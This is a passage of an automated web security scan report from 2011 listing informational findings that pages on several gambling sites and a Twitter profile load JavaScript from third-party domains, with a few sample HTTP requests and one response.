Path:	/en/Fantasy/Master-Mix

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.79. https://scratch.betsson.com/en/Fantasy/Memory-Madness previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Memory-Madness

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.80. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Ocean-Pearl

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.81. https://scratch.betsson.com/en/Fantasy/Outer-Space previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Outer-Space

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.82. https://scratch.betsson.com/en/Fantasy/Super-Chance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Super-Chance

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.83. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/The-Fairy-Tale

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.84. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/The-Lost-Maya

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.85. https://scratch.betsson.com/en/Fantasy/Treasure-Island previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Treasure-Island

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.86. https://scratch.betsson.com/en/Fantasy/Zodiac previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Zodiac

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.87. https://scratch.betsson.com/en/GameHistory previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/GameHistory

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.88. https://scratch.betsson.com/en/Information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Information

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.89. https://scratch.betsson.com/en/News previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/News

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.90. https://scratch.betsson.com/en/OurScratchcards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/OurScratchcards

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.91. https://scratch.betsson.com/en/Ourwinners previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Ourwinners

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.92. https://scratch.betsson.com/en/Slots/5th-Avenue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/5th-Avenue

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.93. https://scratch.betsson.com/en/Slots/Adventure-Jack previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Adventure-Jack

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.94. https://scratch.betsson.com/en/Slots/Atlantis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Atlantis

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.95. https://scratch.betsson.com/en/Slots/Bon-Apetit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Bon-Apetit

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.96. https://scratch.betsson.com/en/Slots/Cafe-Paris previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Cafe-Paris

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.97. https://scratch.betsson.com/en/Slots/Castle-Slots previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Castle-Slots

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.98. https://scratch.betsson.com/en/Slots/Chic-Boutique previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Chic-Boutique

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.99. https://scratch.betsson.com/en/Slots/Conga-Beat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Conga-Beat

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.100. https://scratch.betsson.com/en/Slots/Egyptian-Magic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Egyptian-Magic

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.101. https://scratch.betsson.com/en/Slots/Esmeralda previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Esmeralda

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.102. https://scratch.betsson.com/en/Slots/Fair-Play previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Fair-Play

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.103. https://scratch.betsson.com/en/Slots/Fantasia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Fantasia

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

19.104. https://scratch.betsson.com/en/Slots/Grand-Crown previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Grand-Crown

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.105. https://scratch.betsson.com/en/Slots/Holiday-Hotel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Holiday-Hotel

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.106. https://scratch.betsson.com/en/Slots/Ice-Land previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Ice-Land

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.107. https://scratch.betsson.com/en/Slots/Legend-Of-Terra previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Legend-Of-Terra

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.108. https://scratch.betsson.com/en/Slots/Monaco-Glamour previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Monaco-Glamour

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.109. https://scratch.betsson.com/en/Slots/Monte-Carlo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Monte-Carlo

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.110. https://scratch.betsson.com/en/Slots/Pirates-Paradise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Pirates-Paradise

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.111. https://scratch.betsson.com/en/Slots/Sakura-Garden previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Sakura-Garden

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.112. https://scratch.betsson.com/en/Slots/Sea-And-Sun previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Sea-And-Sun

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.113. https://scratch.betsson.com/en/Slots/Sky-Of-Love previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Sky-Of-Love

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.114. https://scratch.betsson.com/en/Slots/Triple-Carnival previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Triple-Carnival

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.115. https://scratch.betsson.com/en/Slots/Tropical-Fruit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Slots/Tropical-Fruit

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.116. https://scratch.betsson.com/en/Sports/100m-Champion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/100m-Champion

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.117. https://scratch.betsson.com/en/Sports/Bowling previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Bowling

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.118. https://scratch.betsson.com/en/Sports/Darts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Darts

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.119. https://scratch.betsson.com/en/Sports/Goal-Kick previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Goal-Kick

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.120. https://scratch.betsson.com/en/Sports/Gone-Fishing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Gone-Fishing

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.121. https://scratch.betsson.com/en/Sports/Hippodrome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Hippodrome

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.122. https://scratch.betsson.com/en/Sports/Ready-Set-Go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Ready-Set-Go

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.123. https://scratch.betsson.com/en/Sports/Road-Racing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/Road-Racing

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.124. https://scratch.betsson.com/en/Sports/World-Champions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Sports/World-Champions

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.125. http://sv.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: sv.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.126. http://sv.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: sv.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.127. http://twitter.com/PostcodeLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PostcodeLottery

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346
http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346
http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346
http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346
http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /PostcodeLottery HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-9250-27328
ETag: "509908394cb0e30c33cd8bdb160b0b2c"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.03576
Content-Type: text/html; charset=utf-8
Content-Length: 59180
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e61ab982b4aed01008cdec3c1c8138b280a18ccf
Set-Cookie: k=173.193.214.243.1305547124447352; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
